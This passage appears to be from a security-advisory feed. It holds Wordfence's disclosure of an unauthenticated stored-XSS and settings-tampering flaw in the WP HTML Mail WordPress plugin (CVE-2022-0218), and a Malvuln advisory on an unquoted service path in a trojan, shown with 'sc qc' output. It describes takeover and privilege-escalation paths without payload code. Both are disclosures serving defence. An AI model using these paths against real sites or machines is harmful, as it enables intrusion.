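The fix belongs at the output, chosen per context (text, attribute, URL, JavaScript), not at the input: stripping angle brackets on save would leave the attribute payload intact and would also corrupt legitimate data.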
<pre><code>The flaw makes it possible for unauthenticated attackers to achieve complete site takeover.<br /><br />On December 23, 2021 the Wordfence Threat Intelligence team initiated the responsible disclosure process for a vulnerability we discovered in “WordPress Email Template Designer – WP HTML Mail”, a WordPress plugin that is installed on over 20,000 sites. This flaw made it possible for an unauthenticated attacker to inject malicious JavaScript that would execute whenever a site administrator accessed the template editor. It would also allow them to modify the email template to contain arbitrary content that could be used to perform a phishing attack against anyone who received emails from the compromised site.<br /><br />We sent the full disclosure details to the developer on January 10, 2022, after multiple attempts to contact the developer and eventually receiving a response. The developer quickly acknowledged the report and released a patch on January 13, 2022.<br /><br />We strongly recommend ensuring that your site has been updated to the latest patched version of “WordPress Email Template Designer – WP HTML Mail”, which is version 3.1 at the time of this publication.<br /><br />This post was also published on the Wordfence blog.<br /><br />Description: Unprotected REST-API Endpoint to Unauthenticated Stored Cross-Site Scripting and Data Modification<br /><br />Affected Plugin: WordPress Email Template Designer – WP HTML Mail<br /><br />Plugin Slug: wp-html-mail<br /><br />Plugin Developer: codemiq<br /><br />Affected Versions: <= 3.0.9<br /><br />CVE ID: CVE-2022-0218<br /><br />CVSS Score: 8.3 (High)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N<br /><br />Researcher/s: Chloe Chamberland<br /><br />Fully Patched Version: 3.1<br /><br />WP HTML Mail is a WordPress plugin developed to make designing custom emails simpler for WordPress site owners. It is compatible with various WordPress plugins like WooCommerce, Ninja Forms, BuddyPress, and more. The plugin registers two REST-API routes which are used to retrieve and update email template settings. Unfortunately, these were insecurely implemented, making it possible for unauthenticated users to access these endpoints.<br /><br />More specifically, the plugin registers the /themesettings endpoint, which calls the saveThemeSettings function or the getThemeSettings function depending on the request method. The route did register a permission_callback, but it was set to __return_true, so no authentication or capability check was performed before either function ran. Therefore, any visitor could call the endpoint to save or retrieve the email theme settings.<br /><br />[The code snippet showing the route registration is omitted from this copy; see the full article on the Wordfence blog.]<br /><br />As this functionality was designed to implement setting changes for the email template, an unauthenticated user could easily make changes to the email template that could aid in phishing attempts against users that receive emails from the targeted site. Worse yet, unauthenticated attackers could inject malicious JavaScript into the mail template that would execute anytime a site administrator accessed the HTML mail editor.<br /><br />As always, cross-site scripting vulnerabilities can be used to inject code that can add new administrative users, redirect victims to malicious sites, inject backdoors into theme and plugin files, and more. Combined with the fact that the vulnerability can be exploited by attackers with no privileges on a vulnerable site, there is a high chance that unauthenticated attackers could gain administrative access to sites running the vulnerable version of the plugin. 
As such, we strongly recommend that you verify that your site is running the most up-to-date version of the plugin immediately.<br /><br />Timeline<br /><br />December 23, 2021 – Conclusion of the plugin analysis that led to the discovery of a Stored Cross-Site Scripting vulnerability in the “WordPress Email Template Designer – WP HTML Mail” plugin. We develop and release a firewall rule to protect Wordfence users. Wordfence Premium users receive this rule immediately. We attempt to initiate contact with the developer.<br /><br />January 4, 2022 – We send an additional outreach attempt to the developer.<br /><br />January 10, 2022 – The developer confirms the inbox for handling the discussion. We send over the full disclosure details.<br /><br />January 11, 2022 – The developer acknowledges the report and indicates that they will work on a fix.<br /><br />January 13, 2022 – A fully patched version of the plugin is released as version 3.1.<br /><br />January 22, 2022 – The firewall rule becomes available to free Wordfence users.<br /><br />Conclusion<br /><br />In today’s post, we detailed a flaw in the “WordPress Email Template Designer – WP HTML Mail” plugin that made it possible for unauthenticated attackers to inject malicious web scripts that would execute whenever a site owner accessed the plugin’s mail editor, which could lead to complete site compromise. This flaw has been fully patched in version 3.1.<br /><br />We recommend that WordPress site owners immediately verify that their site has been updated to the latest patched version available, which is version 3.1 at the time of this publication.<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/7588da376f496aa678cdfca4e404f38a.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.Win32.Servstar.poa<br />Vulnerability: Insecure Service Path<br />Description: The malware creates a service with an unquoted path. Third party attackers who can place an arbitrary executable under c:\ drive can potentially undermine the integrity of the malware by having it run theirs instead with SYSTEM privs.<br />Type: PE32<br />MD5: 7588da376f496aa678cdfca4e404f38a<br />Vuln ID: MVID-2021-0397<br />Dropped files: Random named e.g. waqqoo.exe, iigkie.exe<br />Disclosure: 11/07/2021<br /><br /><br />Exploit/PoC:<br />C:\>sc qc MSUpdqtewux<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: MSUpdqtewux<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 0 IGNORE<br /> BINARY_PATH_NAME : C:\Program Files\iigkie.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Microsoft Windows Uqdateouq Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. 
The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>